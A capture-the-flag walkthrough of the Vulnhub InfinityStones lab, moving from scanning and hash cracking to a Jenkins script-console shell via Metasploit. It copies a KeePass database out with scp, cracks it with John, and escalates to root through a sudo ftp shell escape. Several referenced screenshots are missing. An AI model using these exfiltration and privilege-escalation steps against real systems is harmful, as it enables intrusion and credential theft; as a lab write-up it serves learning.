Vulnhub InfinityStones Walkthrough

We start by scanning the host with nmap -A -T4 -p- -vv 192.168.1.20 (all TCP ports, with service/version detection and default scripts):

Dirb scan results:

Alongside the pwd.txt file there is a capture named reality.cap, which we downloaded. It looks like a Wi-Fi capture taken around a deauthentication of a client from the router (the usual way to collect a handshake), but running it through Aircrack-ng with a wordlist gave nothing:

Downloading the space image and inspecting it with exiftool, we can see a comment embedded in the photo:

It says "space stone" followed by a hash; cracking the hash with an online lookup service returned the name yashika.
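The two steps above (pull the comment out of the JPEG, then recover the plaintext from the hash) can be done offline. The following is an added example, not code from the original walkthrough: it parses JPEG marker segments by hand, extracts the COM segment that exiftool reports as "Comment", picks out a hex digest, and runs a small dictionary attack against it. The JPEG bytes and the wordlist are constructed here, and the digest algorithm is guessed from the digest length, which is an assumption (the page does not say what kind of hash was in the photo).

```python
import hashlib
import struct
from typing import List, Optional

def build_sample_jpeg(comment: str) -> bytes:
    """Constructed minimal JPEG: SOI, one COM (0xFFFE) segment, EOI.
    A real file has many more segments and entropy-coded image data."""
    body = comment.encode()
    # The segment length field counts itself (2 bytes) plus the payload.
    return b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", len(body) + 2) + body + b"\xff\xd9"

def jpeg_comments(data: bytes) -> List[str]:
    """Walk the JPEG header segments and return the text of every COM segment."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    comments = []
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError(f"expected a marker at offset {i}")
        marker = data[i + 1]
        if marker == 0xFF:                      # fill byte before a marker
            i += 1
            continue
        if marker in (0xD9, 0xDA):              # EOI, or SOS: image data follows, stop
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # standalone markers carry no length
            i += 2
            continue
        if i + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[i + 2:i + 4])[0]
        payload = data[i + 4:i + 2 + length]
        if marker == 0xFE:
            comments.append(payload.decode("utf-8", errors="replace"))
        i += 2 + length
    return comments

# Assumption: the digest type is inferred from its length.
HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}

def extract_hash(comment: str) -> Optional[str]:
    """Return the first whitespace-separated token that looks like a hex digest."""
    for token in comment.split():
        t = token.lower()
        if len(t) in HASH_BY_LEN and all(c in "0123456789abcdef" for c in t):
            return t
    return None

def crack(digest: Optional[str], wordlist) -> Optional[str]:
    """Dictionary attack: hash every candidate with the inferred algorithm and compare."""
    if digest is None or len(digest) not in HASH_BY_LEN:
        return None
    algo = HASH_BY_LEN[len(digest)]
    for word in wordlist:
        word = word.strip()
        if hashlib.new(algo, word.encode()).hexdigest() == digest:
            return word
    return None

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = ["thanos", "gamora", "yashika", "nebula"]

def demo() -> Optional[str]:
    """Build a photo whose comment is 'space stone <md5>' and crack the digest."""
    sample = build_sample_jpeg("space stone " + hashlib.md5(b"yashika").hexdigest())
    comment = jpeg_comments(sample)[0]
    return crack(extract_hash(comment), WORDLIST)

if __name__ == "__main__":
    print(demo())
```

On a real file, replace build_sample_jpeg(...) with open("space.jpg", "rb").read(); the parser stops at the SOS marker, so it never has to understand the compressed image data.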

The page aether.php is a quiz; answering it in binary gave the code 01101001, which turns out to be the path to a hint file:

The hint file contained a weird-looking piece of code. A Google search identified it as Brainfuck, and decoding it gave a login name and password, admin:avengers.
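Rather than pasting an unknown program into an online decoder, it is easy to run Brainfuck locally. The interpreter below is an added example, not code from the original walkthrough; the Brainfuck program from the hint file is not reproduced on the page, so the test inputs here are constructed: the classic "Hello World!" program and a program generated by a small encoder for the credential string the page reports.

```python
from typing import Dict

def _bracket_map(code: str) -> Dict[int, int]:
    """Pre-compute matching [ and ] positions so jumps are O(1); reject unbalanced code."""
    stack, pairs = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ] at position {pos}")
            start = stack.pop()
            pairs[start], pairs[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched [ at position {stack[-1]}")
    return pairs

def run_brainfuck(code: str, stdin: bytes = b"", max_steps: int = 1_000_000) -> str:
    """Execute a Brainfuck program and return its output (8-bit wrapping cells, 30000-cell tape).
    max_steps guards against a program that never terminates."""
    code = "".join(ch for ch in code if ch in "<>+-.,[]")   # every other character is a comment
    jumps = _bracket_map(code)
    tape = bytearray(30000)
    ptr = pc = steps = 0
    inp = iter(stdin)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (non-terminating program?)")
        ch = code[pc]
        if ch == ">":
            ptr = (ptr + 1) % len(tape)
        elif ch == "<":
            ptr = (ptr - 1) % len(tape)
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)            # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]                      # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]                      # back to the matching [
        pc += 1
    return out.decode("latin-1")

def encode_brainfuck(text: str) -> str:
    """Naive encoder used to build a test program: move one cell to each byte value
    by the delta from the previous byte, then print it."""
    prev, parts = 0, []
    for b in text.encode("latin-1"):
        delta = b - prev
        parts.append("+" * delta if delta >= 0 else "-" * -delta)
        parts.append(".")
        prev = b
    return "".join(parts)

# Constructed sample: the well-known Hello World program.
HELLO_WORLD = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
               ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++.")

if __name__ == "__main__":
    print(run_brainfuck(HELLO_WORLD), end="")
    print(run_brainfuck(encode_brainfuck("admin:avengers")))
```

To decode a real hint file, read its contents into a string and pass it to run_brainfuck; the step limit keeps a malformed or hostile program from hanging the decoder.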

Now let's head to http://192.168.1.20:8080, where Jenkins is running, and log in with those credentials.

And we got in :

Searching searchsploit for Jenkins turns up a Metasploit module that can be used to get a shell on the host: exploit/multi/http/jenkins_script_console, which runs Groovy through the authenticated script console.

Running the LinEnum.sh script showed a file named script in /opt, next to a KeePass database, morag.kdbx, which I copied into the web root so I could download it to my machine. The script file we had already seen: it was embedded in the image we decoded earlier, where we found yashika.

While copying the file to /var/www/html I found a folder named gamA00fe2012, which looked like the password for the reality.cap capture we found earlier.

Just to be sure, I ran it through Aircrack-ng again, and yes, it is the password for reality.cap.

Back to the morag.kdbx file: I copied it to my machine with scp -P 22 morag.kdbx root@192.168.1.15:/root/ and converted it into a hash that John can crack (John ships keepass2john for exactly this).

With the cracked password, princesa, we can open the database in the online KeeWeb client at https://app.keeweb.info/ (a local client such as KeePassXC does the same without uploading a target's password database to a third party).

Inside the database was a base64-encoded value, which decodes to the credentials morag:yondu.

Logging in as morag, sudo allows running /usr/bin/ftp as root, so the escalation is simply:

sudo /usr/bin/ftp

ftp> !/bin/sh

The ! command in the ftp client spawns a shell, which inherits root from sudo.
